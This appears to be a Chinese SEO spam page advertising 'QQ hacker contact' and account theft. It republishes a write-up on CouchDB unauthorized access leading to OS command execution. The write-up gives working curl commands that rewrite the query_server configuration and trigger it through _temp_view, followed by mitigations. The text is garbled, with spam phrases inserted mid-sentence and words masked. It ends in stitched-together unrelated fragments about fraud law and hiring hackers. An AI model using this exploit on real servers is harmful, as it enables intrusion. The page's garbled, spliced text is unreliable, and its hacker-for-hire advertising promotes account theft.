qq黑客联络-利用CouchDB未受权访问漏洞实行随意DOS命令
0x00 序言
5月16日阿里云盾防御抵抗精英团队从外界方式得知CouchDB数据库查询存有未受权访问漏洞(在配置有误的状况下)。历经检测,云盾精英团队首先发觉利用该未受权访问漏洞不但会导致数据信息的遗失和泄漏,乃至可实行随意DOS命令。云盾安全性专家团之一时间完成了漏洞汇报、安全性定级,并通告了全部很有可能受影响的客户。下边将对该漏洞的出處和关键技术做详尽表述。
0x01 漏洞的前因后果
哪里可以找黑客帮忙盗 ***CouchDB 是一个开源系统的朝向文本文档的数据库查询智能管理系统,能够根据 RESTful JavaScript Object Notation ( *** ON) API 访问。CouchDB会默认设置会在5984端口号对外开放Restful的API插口,用以数据库查询的管理 *** 作用。
那麼,难题出在哪呢?阅览官方网叙述会发觉,CouchDB中有一个Query_Server的配置项,在官方网文本文档中是那么叙述的:
CouchDB delegates computation of design documents functions 哪里可以找黑客帮忙盗 *** to external query servers. The external query server is a special OS process which communicates with CouchDB over standard input/output using a very simple line-based protocol with *** ON messages.
直接点说,便是CouchDB容许客户特定一个二进制程序流程或是脚本 *** ,与CouchDB开展数据信息互动和解决,query_server在配置文档local.ini中的文件格式:
[query_servers]
LANGUAGE 哪里可以找黑客帮忙盗 *** = PATH ARGS
默认设置状况下,配置文档中早已设定了2个query_servers:
[query_servers]
javascript = /usr/bin/couchjs /usr/share/couchdb/server/main.js
coffeescript = /usr/bin/couchjs 哪里可以找黑客帮忙盗 *** /usr/share/couchdb/server/main-coffee.js
能够见到,CouchDB在query_server中导入了外界的二进制程序流程来运行命令,如果我们能够变更这一配置,那麼就可以利用数据库查询来运行命令了,可是这一配置是在local.ini文件中的,怎样操纵呢?
再次读官方网的文本文档,发觉了一个有趣的作用,CouchDB出示了一个API插口用于变更本身的配置,并把改动后的結果储存到配置文档中:
The CouchDB Server Configuration API provide an interface to 哪里可以找黑客帮忙盗 *** query and update the various configuration values within a running CouchDB instance
换句话说,除开local.ini的配置文档,CouchDB容许根据本身出示的Restful API插口动态性改动配置特性。融合之上二点,我们可以根据一个未受权访问的CouchDB,根据改动其query_server配置,来实行DOS命令。
0x02 哪里可以找黑客帮忙盗 *** 漏洞的POC
增加query_server配置,这儿实行ifconfig指令
#!shell
curl -X PUT 'http://1.1.1.1:5984/_config/query_servers/cmd' -d '"/ *** in/ifconfig >/tmp/6666"'
新创建一个临时表, *** 一条纪录
#!shell
curl -X PUT 'http://1.1.1.1:5984/vultest'
curl -X PUT 'http://1.1.1.1:5984/vultest/vul' -d '{"_id":"770895a97726d5ca6d70a22173005c7b"}'
启用query_server解决数据信息
#!shell
curl -X POST 'http://1.1.1.1:5984/vultest/_temp_view?limit=11' 哪里可以找黑客帮忙盗 *** -d '{"language":"cmd","map":""}' -H 'Content-Type: application/json'
实行后,能够见到,特定的指令早已取得成功实行:
对于怎样回显实行結果,诸位能够动动脑子,热烈欢迎互动交流。
0x03 漏洞恢复提议:
1、特定CouchDB关联的IP (必须重新启动CouchDB才可以起效) 在 /etc/couchdb/local.ini 文档中寻找 “bind_address = 0.0.0.0” ,把 0.0.0.0 改动为 127.0.0.1 ,随后储存。注:改动后哪里可以找黑客帮忙盗 *** 仅有该设备才可以访问CouchDB。
2、设定访问登陆密码 (必须重新启动CouchDB才可以起效) 在 /etc/couchdb/local.ini 中寻找“[admins]”字段名配置登陆密码。
附:参照连接:
http://blog.rot13.org/2010/11/triggers-in-couchdb-from-queue-to-external-command-execution.html
哪里可以找黑客帮忙盗 *** http://docs.couchdb.org/en/1.6.1/api/server/configuration.html#api-config
http://docs.couchdb.org/en/1.6.1/intro/api.html
http://docs.couchdb.org/en/1.6.1/config/query-servers.html
。行骗依据审理案件工作经验,我回应一下。1、依据《中华人民共和国刑法》第二百六十六条要求,诈骗罪就是指以非法侵占罪为目地,用编造客观事实或是瞒报实情的哪里可以找黑客帮忙盗 *** 方。qq黑客联络
*** 黑客帮忙盗号最少要多少钱那需看你需要干什么种类的“ *** 黑客”了做小白到 *** 黑客网站随意学习便可,即二楼类的规定(用他人的手机软件生产制造木马病毒进攻等)假如你想干有点儿整体实力的 *** 黑客那麼你也就。
qq黑客联络假如您感觉本身安全性遭受威协,为何不警报,警察会以技术专业角度輔助您做分辨。
*** 黑客原本是一些实际操作电子计算机的大神,但是她们骗起來很有可能会更黑。我们在OICQ聊天的情况下很可能会出现一些路人乃至是最熟悉的人发来文档给你接受,这种生疏的文档。
。傻了吧!这些故意锁机,有多少有良知的,有良知的就不容易去故意锁他人电脑上,哪里可以找黑客帮忙盗 *** 锁他人电脑上的,就没一个有良知的,一而再再而三的骗财,便是不让你开启。以。qq黑客联络
要完成批处理命令一键安装,你需要先掌握静默安装主要参数,最常见的有/s、/S,详细信息百度搜索,并且此软件务必适用静默安装主要参数,假如不兼容,只有撰写autoit(AU3)脚本 *** 仿真模拟。
qq黑客联络分2个系统软件,互联网和金融机构门店。安全等级较为高,因此 难以攻克。
标签:
版权声明
本文仅代表作者观点,不代表本站立场。
本文系作者授权发表,未经许可,不得转载。